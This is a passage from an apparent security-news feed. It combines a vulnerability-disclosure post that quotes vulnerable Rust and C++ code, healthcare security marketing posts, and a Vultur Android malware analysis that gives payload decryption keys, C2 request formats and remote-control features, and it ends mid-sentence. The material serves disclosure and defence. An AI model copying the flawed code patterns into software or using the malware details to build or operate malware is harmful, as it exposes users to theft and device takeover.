Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST. From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there. The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits. The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately. Case 4: DoS vector in the num-bigint Rust library In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE. The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear. But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails. The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature: use num_bigint::BigUint; use std::io::Read; fn main() -> std::io::Result<()> { let mut buf = Vec::new(); let _ = std::io::stdin().read_to_end(&mut buf)?; let _: BigUint = bincode::deserialize(&buf).unwrap_or_default(); Ok(()) } Figure 3: Example deserialization format It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed. 
impl<'de> Visitor<'de> for U32Visitor { type Value = BigUint; {...omitted for brevity...} #[cfg(not(u64_digit))] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { let len = seq.size_hint().unwrap_or(0); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } #[cfg(u64_digit)] fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error> where S: SeqAccess<'de>, { use crate::big_digit::BigDigit; use num_integer::Integer; let u32_len = seq.size_hint().unwrap_or(0); let len = Integer::div_ceil(&u32_len, &2); let mut data = Vec::with_capacity(len); {...omitted for brevity...} } } Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108) We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4. Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark. During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement: MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path, std::string cryptKey) { __android_log_print(ANDROID_LOG_INFO, "RNMMKV", "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)", instanceId.c_str(), path.c_str(), cryptKey.c_str()); std::string* pathPtr = path.size() > 0 ? &path : nullptr; {...omitted for brevity...} Figure 5: Code that initializes MMKV and also logs the encryption key Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled. With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install. This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process. Takeaways GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. 
With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers). The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls. However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness. Step 1: Add a security policy Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability. GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root. We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following: We have multiple channels for receiving reports: * If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to security@example.com Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly. Step 2: Enable private reporting Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies. Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require. After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”: Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this: If you want to enable private reporting for your whole organization, then check out this documentation. A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically. On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub. This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design. Step 3: Get notifications via webhooks If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type: After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability. How to make security researchers happy If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day. If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting. If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. 
The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.
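As a companion to Step 3, a minimal receiver for those webhook deliveries might look like the sketch below. The X-GitHub-Event and X-Hub-Signature-256 headers are standard GitHub webhook behaviour; the field names inside the repository_advisory payload (summary, description) are assumptions based on the description above, so verify them against a real delivery before relying on them.

import hashlib
import hmac
import os

from flask import Flask, abort, request

app = Flask(__name__)
WEBHOOK_SECRET = os.environ.get("GITHUB_WEBHOOK_SECRET", "").encode()

def signature_is_valid(body, signature_header):
    """Verify GitHub's HMAC-SHA256 webhook signature."""
    if not WEBHOOK_SECRET or not signature_header:
        return False
    expected = "sha256=" + hmac.new(WEBHOOK_SECRET, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, signature_header)

@app.route("/github-webhook", methods=["POST"])
def github_webhook():
    if not signature_is_valid(request.get_data(), request.headers.get("X-Hub-Signature-256")):
        abort(401)
    if request.headers.get("X-GitHub-Event") != "repository_advisory":
        return "", 204
    payload = request.get_json(silent=True) or {}
    advisory = payload.get("repository_advisory", {})  # field name assumed; check a real payload
    # Forward wherever you like (Slack, ticketing, ...); here we just log it.
    app.logger.warning("New advisory report: %s - %s",
                       advisory.get("summary"), advisory.get("description"))
    return "", 204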
Categories: Security Posts

Overview of Content Published in March

Didier Stevens - Sun, 2024/04/14 - 12:38
Here is an overview of content I published in March:

Blog posts: SANS ISC Diary entries:
Categories: Security Posts

3 healthcare organizations that are building cyber resilience

Webroot - Fri, 2024/04/05 - 20:15
From 2018 to 2023, healthcare data breaches have increased by 93 percent. And ransomware attacks have grown by 278 percent over the same period. Healthcare organizations can’t afford to let preventable breaches slip by. Globally, the average cost of a healthcare data breach has reached $10.93 million. The situation for healthcare organizations may seem bleak. But there is hope. Focus on layering your security posture to focus on threat prevention, protection, and recovery. Check out three healthcare organizations that are strengthening their cyber resilience with layered security tools. 1. Memorial Hermann balances user experience with encryption Email encryption keeps sensitive medical data safe and organizations compliant. Unfortunately, providers will skip it if the encryption tool is difficult to use. Memorial Hermann ran into this exact issue. Juggling compliance requirements with productivity needs, the organization worried about the user experience for email encryption. Webroot Email Encryption powered by Zix provides the solution. Nearly 75 percent of Memorial Hermann’s encrypted emails go to customers who share Webroot. Now more than 1,750 outside organizations can access encrypted email right from their inbox, with no extra steps or passwords. Read the full case study. 2. Allergy, Asthma and Sinus Center safeguards email The center needed to protect electronic medical records (EMR). But its old software solution required technical oversight that was difficult to manage. Webroot Email Threat Protection by OpenText gives the healthcare organization an easy way to keep EMR secure. OpenText’s in-house research team is continually monitoring new and emerging threats to ensure the center’s threat protection is always up to date. With high-quality protection and a low-maintenance design, the IT team can focus on other projects. When patient data is at stake, the center knows it can trust Webroot. Read the full case study. 3. Radiology Associates avoid downtime with fast recovery Radiologists need to read and interpret patient reports so they can quickly share them with doctors. Their patients’ health can’t afford for them to have downtime. After an unexpected server crash corrupted its database, Radiology Associates needed a way to avoid workflow interruptions. Carbonite Recover by OpenText helps the organization get back to business quickly in the event of a data breach or natural disaster. Plus, the price of the solution and ease of use gave Radiology Associates good reasons to choose our solution. Read the full case study. Conclusion As ransomware becomes more sophisticated and data breaches occur more frequently, healthcare organizations must stay vigilant. Strong cyber resilience should be a priority so that you can protect patient privacy and maintain trust within the healthcare industry. And you don’t have to do it alone. We’re ready to help out as your trusted cybersecurity partner. Together, we can prevent data breaches, protect sensitive data, and help you recover when disaster strikes. Contact us to learn more about our cybersecurity solutions. The post 3 healthcare organizations that are building cyber resilience appeared first on Webroot Blog.
Categories: Security Posts

5 ways to strengthen healthcare cybersecurity

Webroot - Fri, 2024/04/05 - 19:44
Ransomware attacks are targeting healthcare organizations more frequently. The number of costly cyberattacks on US hospitals has doubled. So how do you prevent these attacks? Keep reading to learn five ways you can strengthen security at your organization. But first, let's find out what's at stake.
Why healthcare needs better cybersecurity
Healthcare organizations are especially vulnerable to data breaches because of how much data they hold. And when a breach happens, it creates financial burdens and affects regulatory compliance. On average, the cost of a healthcare data breach globally is $10.93 million. Noncompliance not only incurs more costs but also hurts patient trust. Once that trust is lost, it's difficult to regain, which can affect your business and standing within the industry. Adopting a layered security approach will help your organization prevent these attacks. Here are five ways to strengthen your cybersecurity:
1. Use preventive security technology
Prevention, as the saying goes, is better than cure. With the right systems and the right methodology, it's possible to detect and intercept most cyberthreats before they lead to a data breach, a loss of service, or a deterioration in patient care.
Examples of prevention-layer technologies include:
2. Provide cybersecurity training
According to Verizon, 82 percent of all breaches involve a human element. Sometimes malicious insiders create security vulnerabilities. Other times, well-intentioned employees fall victim to attacks like phishing: legitimate-looking emails that trick employees into giving attackers their credentials or other sensitive information, like patient data. In fact, 16 percent of breaches start with phishing. When your employees receive basic cybersecurity training, they are more likely to recognize bad actors, report suspicious activity, and avoid risky behavior. You can outsource cybersecurity training or find an automated security training solution that you manage.
3. Ensure regulatory compliance
Healthcare providers are subject to strict data privacy regulations like HIPAA and GDPR. If an avoidable data breach occurs, organizations face hefty fines from state and federal authorities. The email and endpoint protection tools described above help you stay compliant with these regulations. But sometimes a breach is out of your control, so regulators have provided guidelines for how to respond, including investigation, notification, and recovery.
4. Build business recovery plans
Adding a recovery plan to your multilayered security approach is crucial to achieving and maintaining cyber resilient healthcare. Ideally, you'll catch most incoming threats before they become an issue. However, the recovery layer is critical when threats do get through or disasters occur. You might think that your cloud-based applications back up and secure your data, but SaaS vendors explicitly state that data protection and backup are the responsibility of the customer. Some SaaS applications have recovery options, but they're limited and ineffective. A separate backup system is necessary to ensure business continuity. Reasons for implementing a solid recovery strategy include:
  • Re-establishing patient trust.
  • Avoiding disruptions to patient care.
  • Remaining compliant with HIPAA and GDPR requirements.
Remember, lives depend on getting your systems back up quickly. That’s why your healthcare organization needs a secure, continuously updated backup and recovery solution for local and cloud servers.
5. Monitor and improve continuously
Once you have your multilayered security approach in place, you’ll need a centralized management console to help you monitor and control all your security services. This single pane of glass gives you real-time cyber intelligence and all the tools you need to protect your healthcare organization, your reputation, and your investment in digital transformation. You can also spot gaps in your approach and find ways to improve.
Conclusion
Cybersecurity can seem daunting at times. Just remember that every step you take toward cyber resilience helps you protect patient privacy and maintain your credibility within the healthcare industry.
So when you’re feeling overwhelmed or stuck, remember the five ways you can strengthen your layered cybersecurity approach:
  1. Use preventive technology like endpoint protection and email encryption.
  2. Train your employees to recognize malicious activities like phishing.
  3. Ensure that you’re compliant with HIPAA, GDPR, and any other regulatory standards.
  4. Recover your data after a breach with backup and recovery tools.
  5. Monitor your data and improve your approach when necessary.
The post 5 ways to strengthen healthcare cybersecurity appeared first on Webroot Blog.
Categorías: Security Posts

Android Malware Vultur Expands Its Wingspan

Fox-IT - Jue, 2024/03/28 - 12:00
Authored by Joshua Kamp
Executive summary
The authors behind Android banking malware Vultur have been spotted adding new technical features, which allow the malware operator to further remotely interact with the victim’s mobile device. Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions.
Key takeaways
  • The authors behind Vultur, an Android banker that was first discovered in March 2021, have been spotted adding new technical features.
  • New technical features include the ability to:
    • Download, upload, delete, install, and find files;
    • Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more);
    • Prevent apps from running;
    • Display a custom notification in the status bar;
    • Disable Keyguard in order to bypass lock screen security measures.
  • While the new features mostly relate to interacting remotely with the victim’s device in a more flexible way, Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021.
  • Vultur has improved upon its anti-analysis and detection evasion techniques by:
    • Modifying legitimate apps (use of McAfee Security and Android Accessibility Suite package name);
    • Using native code in order to decrypt payloads;
    • Spreading malicious code over multiple payloads;
    • Using AES encryption and Base64 encoding for its C2 communication.
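Two of the takeaways above (the use of native code to decrypt payloads, and the spreading of code over multiple payloads) are unpacked in the Execution flow section later in this post, which names the exact scheme used by the analysed dropper: AES/ECB/PKCS5Padding with a 16-byte key taken from index 6 to 22 of an embedded string. Assuming those details and the pycryptodome package, a minimal analyst sketch for unpacking such an embedded payload from the dropper's assets could look like the following; the local APK filename is a hypothetical placeholder, and the asset name and key string are the ones quoted from this specific sample (they vary across samples).

import zipfile
from Crypto.Cipher import AES  # pycryptodome

def derive_key(embedded_string: str) -> bytes:
    # Mirrors the described Lib.d() behaviour: the AES key is the 16-character
    # substring from index 6 to 22 of the embedded string.
    return embedded_string[6:22].encode()

def decrypt_asset(apk_path: str, asset_name: str, embedded_string: str, out_path: str) -> None:
    # The encrypted payload sits inside the APK (a ZIP archive) under assets/.
    with zipfile.ZipFile(apk_path) as apk:
        ciphertext = apk.read("assets/" + asset_name)
    plaintext = AES.new(derive_key(embedded_string), AES.MODE_ECB).decrypt(ciphertext)
    plaintext = plaintext[:-plaintext[-1]]  # strip the PKCS5/PKCS7 padding bytes
    with open(out_path, "wb") as out:
        out.write(plaintext)

# Values quoted later in the post for the analysed dropper; "dropper.apk" is a
# hypothetical local filename.
decrypt_asset("dropper.apk",
              "78a01b34-2439-41c2-8ab7-d97f3ec158c6",
              "IPIjf4QWNMWkVQN21ucmNiUDZaVw==",
              "vultur_payload1.apk")

Per the Execution flow section, the same routine with the asset named data and the DXMgKBY29QYnRPR1k1STRBNTZNUw== string should yield the second payload; the third payload (a.int) uses AES/CFB instead and is not covered by this sketch.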
Introduction Vultur is one of the first Android banking malware families to include screen recording capabilities. It contains features such as keylogging and interacting with the victim’s device screen. Vultur mainly targets banking apps for keylogging and remote control. Vultur was first discovered by ThreatFabric in late March 2021. Back then, Vultur (ab)used the legitimate software products AlphaVNC and ngrok for remote access to the VNC server running on the victim’s device. Vultur was distributed through a dropper-framework called Brunhilda, responsible for hosting malicious applications on the Google Play Store [1]. The initial blog on Vultur uncovered that there is a notable connection between these two malware families, as they are both developed by the same threat actors [2]. In a recent campaign, the Brunhilda dropper is spread in a hybrid attack using both SMS and a phone call. The first SMS message guides the victim to a phone call. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the McAfee Security app. The dropper deploys an updated version of Vultur banking malware through 3 payloads, where the final 2 Vultur payloads effectively work together by invoking each other’s functionality. The payloads are installed when the infected device has successfully registered with the Brunhilda Command-and-Control (C2) server. In the latest version of Vultur, the threat actors have added a total of 7 new C2 methods and 41 new Firebase Cloud Messaging (FCM) commands. Most of the added commands are related to remote access functionality using Android’s Accessibility Services, allowing the malware operator to remotely interact with the victim’s screen in a way that is more flexible compared to the use of AlphaVNC and ngrok. In this blog we provide a comprehensive analysis of Vultur, beginning with an overview of its infection chain. We then delve into its new features, uncover its obfuscation techniques and evasion methods, and examine its execution flow. Following that, we dissect its C2 communication, discuss detection based on YARA, and draw conclusions. Let’s soar alongside Vultur’s smarter mobile malware strategies! Infection chain In order to deceive unsuspecting individuals into installing malware, the threat actors employ a hybrid attack using two SMS messages and a phone call. First, the victim receives an SMS message that instructs them to call a number if they did not authorise a transaction involving a large amount of money. In reality, this transaction never occurred, but it creates a false sense of urgency to trick the victim into acting quickly. A second SMS is sent during the phone call, where the victim is instructed into installing a trojanised version of the McAfee Security app from a link. This application is actually Brunhilda dropper, which looks benign to the victim as it contains functionality that the original McAfee Security app would have. As illustrated below, this dropper decrypts and executes a total of 3 Vultur-related payloads, giving the threat actors total control over the victim’s mobile device. Figure 1: Visualisation of the complete infection chain. Note: communication with the C2 server occurs during every malware stage. New features in Vultur The latest updates to Vultur bring some interesting changes worth discussing. 
The most intriguing addition is the malware’s ability to remotely interact with the infected device through the use of Android’s Accessibility Services. The malware operator can now send commands in order to perform clicks, scrolls, swipe gestures, and more. Firebase Cloud Messaging (FCM), a messaging service provided by Google, is used for sending messages from the C2 server to the infected device. The message sent by the malware operator through FCM can contain a command, which, upon receipt, triggers the execution of corresponding functionality within the malware. This eliminates the need for an ongoing connection with the device, as can be seen from the code snippet below. Figure 2: Decompiled code snippet showing Vultur’s ability to perform clicks and scrolls using Accessibility Services. Note for this (and upcoming) screenshot(s): some variables, classes and method names were renamed by the analyst. Pink strings indicate that they were decrypted. While Vultur can still maintain an ongoing remote connection with the device through the use of AlphaVNC and ngrok, the new Accessibility Services related FCM commands provide the actor with more flexibility. In addition to its more advanced remote control capabilities, Vultur introduced file manager functionality in the latest version. The file manager feature includes the ability to download, upload, delete, install, and find files. This effectively grants the actor(s) with even more control over the infected device. Figure 3: Decompiled code snippet showing part of the file manager related functionality. Another interesting new feature is the ability to block the victim from interacting with apps on the device. Regarding this functionality, the malware operator can specify a list of apps to press back on when detected as running on the device. The actor can include custom HTML code as a “template” for blocked apps. The list of apps to block and the corresponding HTML code to be displayed is retrieved through the vnc.blocked.packages C2 method. This is then stored in the app’s SharedPreferences. If available, the HTML code related to the blocked app will be displayed in a WebView after it presses back. If no HTML code is set for the app to block, it shows a default “Temporarily Unavailable” message after pressing back. For this feature, payload #3 interacts with code defined in payload #2. Figure 4: Decompiled code snippet showing part of Vultur’s implementation for blocking apps. The use of Android’s Accessibility Services to perform RAT related functionality (such as pressing back, performing clicks and swipe gestures) is something that is not new in Android malware. In fact, it is present in most Android bankers today. The latest features in Vultur show that its actors are catching up with this trend, and are even including functionality that is less common in Android RATs and bankers, such as controlling the device volume. A full list of Vultur’s updated and new C2 methods / FCM commands can be found in the “C2 Communication” section of this blog. Obfuscation techniques & detection evasion Like a crafty bird camouflaging its nest, Vultur now employs a set of new obfuscation and detection evasion techniques when compared to its previous versions. Let’s look into some of the notable updates that set apart the latest variant from older editions of Vultur. 
AES encrypted and Base64 encoded HTTPS traffic In October 2022, ThreatFabric mentioned that Brunhilda started using string obfuscation using AES with a varying key in the malware samples themselves [3]. At this point in time, both Brunhilda and Vultur did not encrypt its HTTP requests. That has changed now, however, with the malware developer’s adoption of AES encryption and Base64 encoding requests in the latest variants. Figure 5: Example AES encrypted and Base64 encoded request for bot registration. By encrypting its communications, malware can evade detection of security solutions that rely on inspecting network traffic for known patterns of malicious activity. The decrypted content of the request can be seen below. Note that the list of installed apps is shown as Base64 encoded text, as this list is encoded before encryption. {"id":"6500","method":"application.register","params":{"package":"com.wsandroid.suite","device":"Android/10","model":"samsung GT-I900","country":"sv-SE","apps":"cHQubm92b2JhbmNvLm5iYXBwO3B0LnNhbnRhbmRlcnRvdHRhLm1vYmlsZXBhcnRpY3VsYXJlcztzYS5hbHJhamhpYmFuay50YWh3ZWVsYXBwO3NhLmNvbS5zZS5hbGthaHJhYmE7c2EuY29tLnN0Y3BheTtzYW1zdW5nLnNldHRpbmdzLnBhc3M7c2Ftc3VuZy5zZXR0aW5ncy5waW47c29mdGF4LnBla2FvLnBvd2VycGF5O3RzYi5tb2JpbGViYW5raW5nO3VrLmNvLmhzYmMuaHNiY3VrbW9iaWxlYmFua2luZzt1ay5jby5tYm5hLmNhcmRzZXJ2aWNlcy5hbmRyb2lkO3VrLmNvLm1ldHJvYmFua29ubGluZS5tb2JpbGUuYW5kcm9pZC5wcm9kdWN0aW9uO3VrLmNvLnNhbnRhbmRlci5zYW50YW5kZXJVSzt1ay5jby50ZXNjb21vYmlsZS5hbmRyb2lkO3VrLmNvLnRzYi5uZXdtb2JpbGViYW5rO3VzLnpvb20udmlkZW9tZWV0aW5nczt3aXQuYW5kcm9pZC5iY3BCYW5raW5nQXBwLm1pbGxlbm5pdW07d2l0LmFuZHJvaWQuYmNwQmFua2luZ0FwcC5taWxsZW5uaXVtUEw7d3d3LmluZ2RpcmVjdC5uYXRpdmVmcmFtZTtzZS5zd2VkYmFuay5tb2JpbA==","tag":"dropper2"} Utilisation of legitimate package names The dropper is a modified version of the legitimate McAfee Security app. In order to masquerade malicious actions, it contains functionality that the official McAfee Security app would have. This has proven to be effective for the threat actors, as the dropper currently has a very low detection rate when analysed on VirusTotal. Figure 6: Brunhilda dropper’s detection rate on VirusTotal. Next to modding the legitimate McAfee Security app, Vultur uses the official Android Accessibility Suite package name for its Accessibility Service. This will be further discussed in the execution flow section of this blog. Figure 7: Snippet of Vultur’s AndroidManifest.xml file, where its Accessibility Service is defined with the Android Accessibility Suite package name. Leveraging native code for payload decryption Native code is typically written in languages like C or C++, which are lower-level than Java or Kotlin, the most popular languages used for Android application development. This means that the code is closer to the machine language of the processor, thus requiring a deeper understanding of lower-level programming concepts. Brunhilda and Vultur have started using native code for decryption of payloads, likely in order to make the samples harder to reverse engineer. Distributing malicious code across multiple payloads In this blog post we show how Brunhilda drops a total of 3 Vultur-related payloads: two APK files and one DEX file. We also showcase how payload #2 and #3 can effectively work together. This fragmentation can complicate the analysis process, as multiple components must be assembled to reveal the malware’s complete functionality. Execution flow: A three-headed… bird? 
While previous versions of Brunhilda delivered Vultur through a single payload, the latest variant now drops Vultur in three layers. The Brunhilda dropper in this campaign is a modified version of the legitimate McAfee Security app, which makes it seem harmless to the victim upon execution as it includes functionality that the official McAfee Security app would have. Figure 8: The modded version of the McAfee Security app is launched. In the background, the infected device registers with its C2 server through the /ejr/ endpoint and the application.register method. In the related HTTP POST request, the C2 is provided with the following information:
  • Malware package name (as the dropper is a modified version of the McAfee Security app, it sends the official com.wsandroid.suite package name);
  • Android version;
  • Device model;
  • Language and country code (example: sv-SE);
  • Base64 encoded list of installed applications;
  • Tag (dropper campaign name, example: dropper2).
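As a side note for analysts: once the plaintext of such a registration request has been recovered (like the decrypted application.register example shown earlier in the post), the installed-app list can be unpacked with a few lines of Python. This is a minimal sketch; register_request.json is a hypothetical placeholder for wherever the decrypted JSON has been saved.

import base64
import json

# Load the decrypted application.register request body (JSON-RPC 2.0).
with open("register_request.json", "r", encoding="utf-8") as f:
    params = json.load(f)["params"]

print(params.get("package"), params.get("device"), params.get("model"),
      params.get("country"), params.get("tag"))

# The "apps" value is Base64 encoded before the request itself is encrypted;
# decoding it yields a ';'-separated list of installed package names.
for pkg in base64.b64decode(params["apps"]).decode("utf-8").split(";"):
    print(" ", pkg)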
The server response is decrypted and stored in a SharedPreference key named 9bd25f13-c3f8-4503-ab34-4bbd63004b6e, where the value indicates whether the registration was successful or not. After successfully registering the bot with the dropper C2, the first Vultur payload is eventually decrypted and installed from an onClick() method. Figure 9: Decryption and installation of the first Vultur payload. In this sample, the encrypted data is hidden in a file named 78a01b34-2439-41c2-8ab7-d97f3ec158c6 that is stored within the app’s “assets” directory. When decrypted, this will reveal an APK file to be installed. The decryption algorithm is implemented in native code, and reveals that it uses AES/ECB/PKCS5Padding to decrypt the first embedded file. The Lib.d() function grabs a substring from index 6 to 22 of the second argument (IPIjf4QWNMWkVQN21ucmNiUDZaVw==) to get the decryption key. The key used in this sample is: QWNMWkVQN21ucmNi (key varies across samples). With this information we can decrypt the 78a01b34-2439-41c2-8ab7-d97f3ec158c6 file, which brings us another APK file to examine: the first Vultur payload. Layer 1: Vultur unveils itself The first Vultur payload also contains the application.register method. The bot registers itself again with the C2 server as observed in the dropper sample. This time, it sends the package name of the current payload (se.accessibility.app in this example), which is not a modded application. The “tag” that was related to the dropper campaign is also removed in this second registration request. The server response contains an encrypted token for further communication with the C2 server and is stored in the SharedPreference key f9078181-3126-4ff5-906e-a38051505098. Figure 10: Decompiled code snippet that shows the data to be sent to the C2 server during bot registration. The main purpose of this first payload is to obtain Accessibility Service privileges and install the next Vultur APK file. Apps with Accessibility Service permissions can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities, such as keylogging, automatically granting itself additional permissions, monitoring foreground apps and overlaying them with phishing windows. In order to gain further control over the infected device, this payload displays custom HTML code that contains instructions to enable Accessibility Services permissions. The HTML code to be displayed in a WebView is retrieved from the installer.config C2 method, where the HTML code is stored in the SharedPreference key bbd1e64e-eba3-463c-95f3-c3bbb35b5907. Figure 11: HTML code is loaded in a WebView, where the APP_NAME variable is replaced with the text “McAfee Master Protection”. In addition to the HTML content, an extra warning message is displayed to further convince the victim into enabling Accessibility Service permissions for the app. This message contains the text “Your system not safe, service McAfee Master Protection turned off. For using full device protection turn it on.” When the warning is displayed, it also sets the value of the SharedPreference key 1590d3a3-1d8e-4ee9-afde-fcc174964db4 to true. This value is later checked in the onAccessibilityEvent() method and the onServiceConnected() method of the malicious app’s Accessibility Service. ANALYST COMMENT
An important observation here is that the malicious app is using the com.google.android.marvin.talkback package name for its Accessibility Service. This is the package name of the official Android Accessibility Suite, as can be seen from the following link: https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback.
The implementation is of course different from the official Android Accessibility Suite and contains malicious code. When the Accessibility Service privileges have been enabled for the payload, it automatically grants itself additional permissions to install apps from unknown sources, and installs the next payload through the UpdateActivity. Figure 12: Decryption and installation of the second Vultur payload. The second encrypted APK is hidden in a file named data that is stored within the app’s “assets” directory. The decryption algorithm is again implemented in native code, and is the same as in the dropper. This time, it uses a different decryption key that is derived from the DXMgKBY29QYnRPR1k1STRBNTZNUw== string. The substring reveals the actual key used in this sample: Y29QYnRPR1k1STRB (key varies across samples). After decrypting, we are presented with the next layer of Vultur. Layer 2: Vultur descends The second Vultur APK contains more important functionality, such as AlphaVNC and ngrok setup, displaying of custom HTML code in WebViews, screen recording, and more. Just like the previous versions of Vultur, the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok. This second Vultur payload also uses the com.google.android.marvin.talkback (Android Accessibility Suite) package name for the malicious Accessibility Service. From here, there are multiple references to methods invoked from another file: the final Vultur payload. This time, the payload is not decrypted from native code. In this sample, an encrypted file named a.int is decrypted using AES/CFB/NoPadding with the decryption key SBhXcwoAiLTNIyLK (stored in SharedPreference key dffa98fe-8bf6-4ed7-8d80-bb1a83c91fbb). We have observed the same decryption key being used in multiple samples for decrypting payload #3. Figure 13: Decryption of the third Vultur payload. Furthermore, from payload #2 onwards, Vultur uses encrypted SharedPreferences for further hiding of malicious configuration related key-value pairs. Layer 3: Vultur strikes The final payload is a Dalvik Executable (DEX) file. This decrypted DEX file holds Vultur’s core functionality. It contains the references to all of the C2 methods (used in communication from bot to C2 server, in order to send or retrieve information) and FCM commands (used in communication from C2 server to bot, in order to perform actions on the infected device). An important observation here, is that code defined in payload #3 can be invoked from payload #2 and vice versa. This means that these final two files effectively work together. Figure 14: Decompiled code snippet showing some of the 